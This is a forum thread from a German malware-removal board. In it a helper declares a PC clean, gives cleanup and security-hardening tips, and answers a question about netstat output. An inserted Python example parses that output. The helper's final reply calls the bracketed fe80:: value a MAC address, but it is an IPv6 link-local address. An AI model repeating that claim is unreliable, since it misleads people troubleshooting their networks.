Hidden:	file C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}\OFFLINE\D68E83A7\A18896BF\Publisher2.exe
Hidden:	file C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}\OFFLINE\D749CF2B\105CB71E\VpPrinterSetup.exe
Hidden:	file C:\Program Files (x86)\Inkscape\inkscape.com
Hidden:	file C:\Program Files (x86)\Vista Buttons\uninstall.exe
Hidden:	file C:\Program Files (x86)\InstallShield Installation Information\unwintv7.exe
Hidden:	file C:\Hauppauge\WinTV v7 CD 2.5c\Setup.exe
Hidden:	file C:\Hauppauge\WinTV v7 CD 2.5c\Registration\Register.exe
Hidden:	file C:\Hauppauge\WinTV v7 CD 2.5c\WinTV7\WinTV7Setup.exe
Hidden:	file C:\Program Files (x86)\MarkAny\ContentSafer\MPXBox.exe
Hidden:	file C:\Program Files (x86)\Common Files\Samsung\DeviceService\Setup.exe

Stopped logging on 17.01.2014 at 19:30:24
         

Old 19.01.2014, 10:24   #8
schrauber
/// the machine
/// TB Trainer
 


Quote:
1) Was there anything suspicious in the logs at the beginning of this thread?
Only adware.
Quote:
2) Can I run any other tools over it?
Nope, it's fine as is, just clean up now.
Quote:
3) What should I use to scan USB sticks and external hard drives that were repeatedly connected to the PC?
With an online scanner or your AV program.

Log is clean.


Done

If you would like to leave praise or criticism, you can do so here


The order here is essential.
  1. If Defogger was used: start Defogger again and click re-enable.
  2. If Combofix was used: (alternatively rename it to uninstall.exe and start it)
    • Windows key + R > Combofix /Uninstall (type it in) > OK
    • Alternative: rename Combofix.exe to uninstall.exe and start it
    • Combofix will now start, possibly update itself and then remove all remnants of itself.
  3. In any case, please download DelFix (Download DelFix) to your desktop:
    • Close all open programs.
    • Start delfix.exe with a double click.
    • Put a check mark in front of every function.
    • Click Start.
    • Note: DelFix removes, among other things, all tools that were used, the quarantine of our scanners and the Java cache, and finally deletes itself.
    • Finally, restart your computer.
  4. If any programs from our cleanup are still left, you can delete them without concern.


Here are a few tips for securing your system.


I cannot mention often enough how important it is that your system is up to date.
  • Please check whether your system downloads Windows updates automatically
  • Windows Updates
    • Windows XP: Start --> Control Panel --> double-click Automatic Updates
    • Windows Vista / 7: Start --> Control Panel --> System and Security --> Turn automatic updating on or off
  • Make sure that automatic updates are enabled.
  • Software Updates
    Installed software can also have security holes which malware can use to infect your system.
    To keep your installed software up to date, I recommend Secunia Online Software.


Anti-Virus Software
  • Make sure you always have anti-virus software installed and that it is up to date as well. It is useless if it is out of date.


Additional Protection
  • MalwareBytes Anti Malware
    This is one of the best anti-malware tools on the market. It is an on-demand scan tool which detects and also removes a lot of current malware.
    Update the tool and run it once a week. The paid version additionally offers a background guard.
    You can find a tutorial on its use here.
  • WinPatrol
    This software takes a snapshot of your system and warns you about possible changes. Download the freeware version from here.


Safe Browsing
  • SpywareBlaster
    You can find a short introduction here
  • MVPs hosts file
    You can find a tutorial here. Unfortunately I have not found a German-language one so far.
  • WOT (Web of Trust)
    This add-on warns you before you visit a site that has been reported as malicious.


Alternative Browsers

Other browsers tend to be somewhat more secure than IE, since they do not use ActiveX elements. These can be abused by spyware to infect your system.
  • Opera
  • Mozilla Firefox.
    • Note: For this browser I have a few useful add-ons here
    • NoScript
      This add-on blocks JavaScript, Java and Flash and other plugins. They are only executed when you confirm it.
    • AdblockPlus
      This add-on blocks most advertising by itself. A right-click on a banner to add it to AdBlockPlus is enough and it will no longer be loaded.
      It also saves download capacity.

Performance
Clean up your temp files regularly. For this I recommend TFC
Stay away from any registry cleaners.
They harm your system more than they help. Here are a few (English) links
Miekemoes Blogspot (MVP)
Bill Castner (MVP)



Don'ts
  • Don't click on everything just because it asks you to and is nice and colorful.
  • Don't use any peer-to-peer or file-sharing software (eMule, uTorrent, ...)
  • Keep your hands off cracks, keygens, serials or other illegal software.
  • Don't open attachments from e-mails you don't know. Above all, watch the file extension, e.g. yourPhoto.jpg.exe
All that's left for me is to wish you lots of fun surfing safely.

Note: Please give me brief feedback once everything is done and there are no more questions, so that I can remove this thread from my subscriptions.
__________________
Regards,
schrauber

Proud Member of UNITE and ASAP since 2009

Donate
Guides and help
Trojaner-Board Facebook page

No help via PM!

Old 20.01.2014, 08:17   #9
franz12
 

Many thanks! Everything has been completed successfully. Wonderful!!!

Old 21.01.2014, 09:25   #10
schrauber
/// the machine
/// TB Trainer
 


You're welcome

Old 22.01.2014, 08:30   #11
franz12
 

Hello again!
I have read up on the topic a bit more and carried out the tips for securing the system. Could you please also take a look at this netstat, or rather netstat -b? It is not clear to me what the lines with "[fe80::d93b:b9e0" mean here. Are these ports and the locations or file sizes of the programs also checked by Malwarebytes and the other tools? Many thanks!

Code:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Alle Rechte vorbehalten.

C:\Windows\system32>netstat -b

Aktive Verbindungen

  Proto  Lokale Adresse         Remoteadresse          Status
  TCP    127.0.0.1:19872        *****-PC:49907        HERGESTELLT
 [Dropbox.exe]
  TCP    127.0.0.1:27015        *****-PC:49889        HERGESTELLT
 [AppleMobileDeviceService.exe]
  TCP    127.0.0.1:49162        *****-PC:50701        HERGESTELLT
 [VersionCueCS2.exe]
  TCP    127.0.0.1:49889        *****-PC:27015        HERGESTELLT
 [iTunesHelper.exe]
  TCP    127.0.0.1:49907        *****-PC:19872        HERGESTELLT
 [Dropbox.exe]
  TCP    127.0.0.1:50701        *****-PC:49162        HERGESTELLT
 [mysqld-nt.exe]
  TCP    127.0.0.1:56423        *****-PC:2559         SYN_GESENDET
 [nvtray.exe]
  TCP    192.168.178.66:49933   snt-re2-10c:http       HERGESTELLT
 [Dropbox.exe]
  TCP    [::1]:49157            *****-PC:49159        HERGESTELLT
 [LMS.exe]
  TCP    [::1]:49159            *****-PC:49157        HERGESTELLT
 [LMS.exe]
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56232  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56248  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56264  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56280  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56297  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56313  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56329  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56345  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56361  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56378  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56394  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56410  *****-PC:16992        WARTEND
  
  C:\Windows\system32>netstat

Aktive Verbindungen

  Proto  Lokale Adresse         Remoteadresse          Status
  TCP    127.0.0.1:19872        *****-PC:49907        HERGESTELLT
  TCP    127.0.0.1:27015        *****-PC:49889        HERGESTELLT
  TCP    127.0.0.1:49162        *****-PC:50701        HERGESTELLT
  TCP    127.0.0.1:49889        *****-PC:27015        HERGESTELLT
  TCP    127.0.0.1:49907        *****-PC:19872        HERGESTELLT
  TCP    127.0.0.1:50701        *****-PC:49162        HERGESTELLT
  TCP    127.0.0.1:56210        *****-PC:2559         SYN_GESENDET
  TCP    192.168.140.1:56209    *****-PC:16993        SYN_GESENDET
  TCP    192.168.178.66:49933   snt-re2-10c:http       HERGESTELLT
  TCP    192.168.178.66:55545   ham02s13-in-f24:https  WARTEND
  TCP    192.168.178.66:55985   muc03s01-in-f15:https  WARTEND
  TCP    192.168.178.66:55988   muc03s07-in-f15:https  WARTEND
  TCP    192.168.178.66:55989   cache:https            WARTEND
  TCP    192.168.178.66:55990   cache:https            WARTEND
  TCP    192.168.178.66:55993   cache:https            WARTEND
  TCP    192.168.178.66:55996   cache:https            WARTEND
  TCP    192.168.178.66:55997   cache:https            WARTEND
  TCP    192.168.178.66:55998   cache:https            WARTEND
  TCP    192.168.178.66:55999   cache:https            WARTEND
  TCP    192.168.178.66:56011   api:http               WARTEND
  TCP    192.168.178.66:56017   ham02s13-in-f24:http   WARTEND
  TCP    192.168.178.66:56018   ham02s13-in-f24:http   WARTEND
  TCP    192.168.178.66:56022   cache:http             WARTEND
  TCP    192.168.178.66:56023   cfdprivileges:http     WARTEND
  TCP    192.168.178.66:56025   cache:http             WARTEND
  TCP    192.168.178.66:56027   mail:http              WARTEND
  TCP    192.168.178.66:56029   mail:http              WARTEND
  TCP    192.168.178.66:56030   mail:http              WARTEND
  TCP    192.168.178.66:56033   malthus:http           WARTEND
  TCP    192.168.178.66:56037   p3nlhg214c1214:http    WARTEND
  TCP    192.168.178.66:56038   p3nlhg214c1214:http    WARTEND
  TCP    [::1]:49157            *****-PC:49159        HERGESTELLT
  TCP    [::1]:49159            *****-PC:49157        HERGESTELLT
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:55991  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56014  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56049  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56065  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56084  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56100  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56117  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56134  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56150  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56166  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56183  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56199  *****-PC:16992        WARTEND

C:\Windows\system32>
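
An added example, not from this thread or from any of the tools it mentions, that parses a shortened copy of the German-localized netstat -b listing above: it pairs each socket with the process name printed on the following line and labels the local address by scope, which is what separates the `[fe80::...%20]` rows (IPv6 link-local, the `%20` being the interface index) from the loopback and LAN sockets. The sample input is a constructed excerpt of the posted output; nothing else is assumed.

```python
import ipaddress
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: a shortened copy of the German-localized "netstat -b"
# listing quoted in the post (HERGESTELLT = ESTABLISHED, WARTEND = TIME_WAIT,
# SYN_GESENDET = SYN_SENT). The "*****" host name is the poster's own redaction.
SAMPLE_NETSTAT = """\
Aktive Verbindungen

  Proto  Lokale Adresse         Remoteadresse          Status
  TCP    127.0.0.1:19872        *****-PC:49907        HERGESTELLT
 [Dropbox.exe]
  TCP    127.0.0.1:56423        *****-PC:2559         SYN_GESENDET
 [nvtray.exe]
  TCP    192.168.178.66:49933   snt-re2-10c:http       HERGESTELLT
 [Dropbox.exe]
  TCP    [::1]:49157            *****-PC:49159        HERGESTELLT
 [LMS.exe]
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56232  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56248  *****-PC:16992        WARTEND
"""

CONN_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(\S+)\s*$")
OWNER_RE = re.compile(r"^\s*\[(.+?)\]\s*$")  # "netstat -b" owner line, e.g. " [Dropbox.exe]"


@dataclass
class Connection:
    proto: str
    local_host: str
    local_port: str
    zone: Optional[str]     # IPv6 scope id after '%', e.g. "20" = interface index 20
    remote_host: str
    remote_port: str
    state: str
    owner: Optional[str]    # process name from the following "[name]" line, if any


def split_endpoint(endpoint: str) -> Tuple[str, Optional[str], str]:
    """Split 'host:port' or '[v6addr%zone]:port' into (host, zone, port)."""
    if endpoint.startswith("["):
        close = endpoint.index("]")
        host, port = endpoint[1:close], endpoint[close + 2:]
    else:
        host, port = endpoint.rsplit(":", 1)
    zone = None
    if "%" in host:
        host, zone = host.split("%", 1)
    return host, zone, port


def parse_netstat(text: str) -> List[Connection]:
    """Parse the socket rows; an owner line always follows the socket it belongs to."""
    conns: List[Connection] = []
    for line in text.splitlines():
        m = CONN_RE.match(line)
        if m:
            proto, local, remote, state = m.groups()
            lhost, zone, lport = split_endpoint(local)
            rhost, _, rport = split_endpoint(remote)
            conns.append(Connection(proto, lhost, lport, zone, rhost, rport, state, None))
            continue
        m = OWNER_RE.match(line)
        if m and conns and conns[-1].owner is None:
            conns[-1].owner = m.group(1)
    return conns


def classify_local(conn: Connection) -> str:
    """Label the local endpoint by address scope (fe80::/10 is IPv6 link-local)."""
    addr = ipaddress.ip_address(conn.local_host)
    if addr.is_loopback:
        return "loopback"
    if addr.version == 6 and addr.is_link_local:
        return "ipv6-link-local%" + (conn.zone or "?")
    if addr.is_private:
        return "private-ipv4" if addr.version == 4 else "private-ipv6"
    return "public"


def summarize(text: str) -> Counter:
    """Count sockets per (owner, local scope, remote port) so repeated patterns stand
    out; rows without an owner are the ones netstat -b could not tie to a process."""
    return Counter(
        (c.owner or "<no owner shown>", classify_local(c), c.remote_port)
        for c in parse_netstat(text)
    )


if __name__ == "__main__":
    for (owner, scope, rport), n in summarize(SAMPLE_NETSTAT).most_common():
        print(f"{n:3d}  {owner:20s} {scope:22s} -> :{rport}")
```

Run it against a saved `netstat -b` listing (`netstat -b > netstat.txt` from an elevated prompt) to see which sockets are owned by which process and which rows carry no owner at all.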
         

Old 22.01.2014, 16:40   #12
schrauber
/// the machine
/// TB Trainer
 


Quote:
[fe80::d93b:b9e0:44c4:57a0%20]:55991 *****-PC:16992
The name you blacked out there, that is the affected computer that is doing this

Quote:
TCP [fe80::d93b:b9e0:44c4:57a0%20]:55991 *****-PC:16992 WARTEND
The part in brackets is the MAC address.
